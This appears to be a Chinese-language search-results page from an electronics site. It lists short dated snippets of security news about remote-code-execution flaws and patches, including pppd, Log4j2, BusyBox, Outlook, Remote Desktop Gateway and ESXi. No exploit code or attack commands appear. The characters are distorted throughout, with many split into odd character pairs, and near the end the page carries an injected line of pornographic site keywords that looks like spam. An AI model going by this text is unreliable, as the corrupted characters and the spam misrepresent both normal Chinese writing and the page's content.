一個(gè)影響點(diǎn)對(duì)點(diǎn)協(xié)議守護(hù)程序（Point-to-Point Protocol daemon，pppd）軟件，并具有 17 年歷史的遠(yuǎn)程代碼執(zhí)行（remote code execution，RCE）漏洞已對(duì)幾個(gè)基于 Linux 的操作系統(tǒng)造成了影響。

2020-03-10 14:32:23

2162

施耐德定級(jí)硬編碼漏洞為“嚴(yán)重”，已發(fā)布修復(fù)建議

近日，施耐德電氣最新發(fā)布的安全公告中，公開致謝頂象洞見安全實(shí)驗(yàn)室發(fā)現(xiàn)并協(xié)助成功修復(fù)硬編碼漏洞（CVE-2020-7498）。公告中施耐德電氣將該漏洞定級(jí)為“嚴(yán)重”，攻擊者利用該漏洞，可對(duì)PLC設(shè)備進(jìn)行重啟、植入惡意軟件，甚至損壞設(shè)備。

2020-06-16 10:01:09

4153

黑客利用遠(yuǎn)程代碼執(zhí)行漏洞，超過30萬個(gè)網(wǎng)站易受到攻擊

黑客正積極利用一個(gè)關(guān)鍵的遠(yuǎn)程代碼執(zhí)行漏洞，允許未經(jīng)驗(yàn)證的攻擊者在運(yùn)行易受攻擊的File Manager插件版本的WordPress站點(diǎn)上載腳本并執(zhí)行任意代碼。

2020-09-03 16:20:47

2214

關(guān)于嵌入式代碼的致命漏洞

隨著互聯(lián)網(wǎng)的發(fā)展，嵌入式設(shè)備正分布在一個(gè)充滿可以被攻擊者利用的源代碼級(jí)安全漏洞的環(huán)境中。因此，嵌入式軟件開發(fā)人員應(yīng)該了解不同類型的安全漏洞——特別是代碼注入。術(shù)語“代碼注入”意味著對(duì)程序的常規(guī)數(shù)據(jù)

2021-01-06 15:13:13

2268

嵌入式代碼的致命安全漏洞

2021-01-15 15:07:55

2721

思科升級(jí)遠(yuǎn)程命令執(zhí)行等高危漏洞

1月19日，思科發(fā)布了安全公告，旗下小型企業(yè)RV110W，RV130，RV130W和RV215W路由器中發(fā)現(xiàn)了遠(yuǎn)程命令執(zhí)行等高危漏洞，建議盡快升級(jí)。以下是漏洞詳情：

2021-01-20 15:40:49

2140

基于神經(jīng)網(wǎng)絡(luò)和代碼相似度的漏洞檢測

靜態(tài)漏洞檢測通常只針對(duì)文本進(jìn)行檢測，執(zhí)行效率高但是易產(chǎn)生誤報(bào)。針對(duì)該問題，結(jié)合神經(jīng)網(wǎng)絡(luò)技術(shù)提出一種基于代碼相似性的漏洞檢測方法。通過對(duì)程序源代碼進(jìn)行敏感函數(shù)定位、程序切片和變量替換等數(shù)據(jù)預(yù)處理操作

2021-05-24 15:13:52

模型調(diào)優(yōu)和復(fù)現(xiàn)算法遇到的一些坑

的數(shù)據(jù)增強(qiáng)方式與代碼的實(shí)現(xiàn)不一樣等。（這些可能發(fā)生在開源復(fù)現(xiàn)者沒有“一比一”復(fù)現(xiàn)論文的情況，也可能發(fā)生在論文作者自己沒有實(shí)現(xiàn)的情況）

2022-05-18 15:03:29

1811

分解漏洞掃描，什么是漏洞掃描？

5W2H?分解漏洞掃描 - WHAT WHAT?什么是漏洞掃描？首先什么是漏洞？國內(nèi)外各種規(guī)范和標(biāo)準(zhǔn)中關(guān)于漏洞（也稱脆弱性，英文對(duì)應(yīng)Vulnerability）的定義很多，摘錄如下：互聯(lián)網(wǎng)工程

2022-10-12 16:38:17

1886

Arduino Nano 33 IoT遠(yuǎn)程調(diào)試及編碼

電子發(fā)燒友網(wǎng)站提供《Arduino Nano 33 IoT遠(yuǎn)程調(diào)試及編碼.zip》資料免費(fèi)下載

2022-10-26 10:57:18

遠(yuǎn)程伺服執(zhí)行器開源分享

電子發(fā)燒友網(wǎng)站提供《遠(yuǎn)程伺服執(zhí)行器開源分享.zip》資料免費(fèi)下載

2023-02-03 09:39:18

如何復(fù)現(xiàn)Log4j2漏洞

ApacheLog4j2是一個(gè)開源的Java日志框架，被廣泛地應(yīng)用在中間件、開發(fā)框架與Web應(yīng)用中。

2023-02-13 10:55:44

2072

車聯(lián)網(wǎng)開源組件BusyBox漏洞分析及復(fù)現(xiàn)

近日，國內(nèi)多家安全實(shí)驗(yàn)室檢測到了針對(duì)于智能網(wǎng)聯(lián)汽車中使用都開源項(xiàng)目busybox漏洞，國外在2022年5月份報(bào)告了此漏洞

2023-02-21 17:49:56

3710

某CMS的命令執(zhí)行漏洞通用挖掘思路分享

大概是在上半年提交了某個(gè)CMS的命令執(zhí)行漏洞，現(xiàn)在過了那么久，也想通過這次挖掘通用型漏洞，整理一下挖掘思路，分享給大家。

2023-05-18 17:18:58

4410

使Struts2應(yīng)用程序更安全：不要包含配置瀏覽器

Struts2 插件包含擴(kuò)展、替換或添加到現(xiàn)有 Struts 框架功能的類和配置。除了 JAR 文件之外，還可以通過將其 JAR 文件添加到應(yīng)用程序的類路徑來安裝插件，以滿足插件本身可能具有的任何

2023-05-25 15:08:57

838

虹科分享|如何防范MOVEit傳輸漏洞|高級(jí)威脅防御

警報(bào)和網(wǎng)絡(luò)安全公告，CL0P勒索軟件團(tuán)伙一直在積極利用漏洞進(jìn)行數(shù)據(jù)外泄，并在目標(biāo)計(jì)算機(jī)上執(zhí)行遠(yuǎn)程命令。我們對(duì)MOVEit傳輸漏洞的了解Progresssecurit

2023-06-29 10:08:20

1527

Python中的默認(rèn)編碼

####1. Python源代碼文件的執(zhí)行過程我們都知道，磁盤上的文件都是以二進(jìn)制格式存放的，其中文本文件都是以某種特定編碼的字節(jié)形式存放的。對(duì)于程序源代碼文件的字符編碼是由編輯器指定的，比如

2023-07-05 16:11:02

1807

PT2264遠(yuǎn)程控制編碼器C手冊(cè)

PT2264是一個(gè)遠(yuǎn)程控制編碼器與PT2294利用CMOS技術(shù)配對(duì).數(shù)據(jù)編碼地址pins適合RF調(diào)制成串行編碼波形.PT2264有一個(gè)最大三狀態(tài)地址12的bits pins提供到531,441（或3減少任何代碼沖突和未經(jīng)授權(quán)的代碼掃描的可能性。

2023-08-21 09:18:13

靜態(tài)代碼塊、構(gòu)造代碼塊、構(gòu)造函數(shù)及普通代碼塊的執(zhí)行順序

在Java中，靜態(tài)代碼塊、構(gòu)造代碼塊、構(gòu)造函數(shù)、普通代碼塊的執(zhí)行順序是一個(gè)筆試的考點(diǎn)，通過這篇文章希望大家能徹底了解它們之間的執(zhí)行順序。 1、靜態(tài)代碼塊 ①、格式在java類中（方法中不能存在靜態(tài)

2023-10-09 15:40:56

2338

蘋果修復(fù)macOS Ventura和Sonoma內(nèi)存漏洞

蘋果強(qiáng)調(diào)，該漏洞可影響macOS Ventura及macOS Sonoma系統(tǒng)，攻擊者可借此生成惡意文件。用戶一旦點(diǎn)擊瀏覽，可能引發(fā)應(yīng)用程序異常關(guān)閉甚至造成任意代碼執(zhí)行風(fēng)險(xiǎn)。

2024-03-14 11:43:46

1228

Rust漏洞可遠(yuǎn)程執(zhí)行惡意指令，已發(fā)布安全補(bǔ)丁

此漏洞源于操作系統(tǒng)命令及參數(shù)注入缺陷，攻擊者能非法執(zhí)行可能有害的指令。CVSS評(píng)分達(dá)10/10，意味著無須認(rèn)證即可借助該漏洞發(fā)起低難度遠(yuǎn)端攻擊。

2024-04-10 14:24:20

1348

微軟去年提交1128個(gè)漏洞，"提權(quán)"和"遠(yuǎn)程代碼執(zhí)行"最為常見

據(jù)BeyondTrust安全平臺(tái)統(tǒng)計(jì)顯示，微軟于2023年共報(bào)告漏洞1128項(xiàng)，相較于2022年的1292個(gè)略微下滑5%，但總漏洞數(shù)仍維持在歷史高位。值得注意的是，NIST通用漏洞評(píng)級(jí)系統(tǒng)中評(píng)分9.0以上的嚴(yán)重漏洞數(shù)量已明顯減少

2024-04-29 16:11:29

997

Adobe修復(fù)35項(xiàng)安全漏洞，主要涉及Acrobat和FrameMaker

值得關(guān)注的是，Adobe對(duì)Acrobat及Acrobat Reader軟件的漏洞修復(fù)最為重視，共修復(fù)了12個(gè)漏洞，其中9個(gè)為“遠(yuǎn)程執(zhí)行代碼”嚴(yán)重漏洞，主要由RAM的“Use After Free”類型漏洞引發(fā)。

2024-05-16 15:12:41

1401

C2000 DCSM ROM代碼片段/ROP漏洞

電子發(fā)燒友網(wǎng)站提供《C2000 DCSM ROM代碼片段/ROP漏洞.pdf》資料免費(fèi)下載

2024-08-28 09:39:01

微軟Outlook曝高危安全漏洞

近日，美國網(wǎng)絡(luò)安全和基礎(chǔ)設(shè)施安全局(CISA)發(fā)布了一項(xiàng)緊急安全公告，揭示了微軟Outlook中存在的一個(gè)高危遠(yuǎn)程代碼執(zhí)行漏洞(CVE-2024-21413)。該漏洞的嚴(yán)重性不容忽視，已成為惡意網(wǎng)絡(luò)

2025-02-10 09:17:04

883

官方實(shí)錘，微軟遠(yuǎn)程桌面爆高危漏洞，企業(yè)數(shù)據(jù)安全告急！

近日，微軟發(fā)布安全通告，其Windows遠(yuǎn)程桌面網(wǎng)關(guān)（RD）服務(wù)存在兩大高危漏洞：CVE-2025-26677CVE-2025-26677是遠(yuǎn)程桌面網(wǎng)關(guān)服務(wù)DoS漏洞，允許未經(jīng)授權(quán)的攻擊者觸發(fā)

2025-05-16 17:35:43

809

行業(yè)觀察 | VMware ESXi 服務(wù)器暴露高危漏洞，中國1700余臺(tái)面臨勒索軟件威脅

8.x版本，允許未經(jīng)身份驗(yàn)證的遠(yuǎn)程攻擊者在虛擬環(huán)境中執(zhí)行任意代碼、提升權(quán)限或傳播勒索軟件等。更令人擔(dān)憂的是，該漏洞利用難度極低，且相關(guān)利用代碼據(jù)信已在7月底于地下論壇

2025-08-14 16:58:11

1732

行業(yè)觀察 | Azure、RDP、NTLM 均現(xiàn)高危漏洞，微軟發(fā)布2025年8月安全更新

-CVE-2025-53779：WindowsKerberos漏洞，允許攻擊者將權(quán)限提升至域管理員。?13個(gè)嚴(yán)重漏洞：-9個(gè)遠(yuǎn)程代碼執(zhí)行漏洞-3個(gè)信息泄露漏洞-1個(gè)權(quán)

2025-08-25 17:48:38

2188

行業(yè)觀察 | 微軟發(fā)布高危漏洞更新，涉及 Windows、Office、SQL Server 等多款產(chǎn)品

漏洞被評(píng)級(jí)為“嚴(yán)重”。企業(yè)應(yīng)優(yōu)先部署Windows10/11累積更新和SQLServer相關(guān)補(bǔ)丁，并檢查SMB設(shè)置。漏洞類型分布-41個(gè)權(quán)限提升漏洞-22個(gè)遠(yuǎn)程代碼

2025-09-12 17:05:22

2351

行業(yè)觀察 | Windows 10于本月終止服務(wù)支持，微軟發(fā)布10月高危漏洞更新

已被實(shí)際利用的零日漏洞，以及多個(gè)CVSS評(píng)分高達(dá)9.9的關(guān)鍵遠(yuǎn)程代碼執(zhí)行漏洞。隨著Windows10于本月終止服務(wù)支持，IT團(tuán)隊(duì)面臨關(guān)鍵的更新周期，需重點(diǎn)關(guān)注身份認(rèn)

2025-10-16 16:57:53

1698

已全部加載完成

哈哈哈哈哈操欧洲电影,久草网在线,亚洲久久熟女熟妇视频,麻豆精品色,久久福利在线视频,日韩中文字幕的,淫乱毛视频一区,亚洲成人一二三,中文人妻日韩精品电影

搜索歷史

Struts2遠(yuǎn)程代碼執(zhí)行漏洞復(fù)現(xiàn)編碼

評(píng)論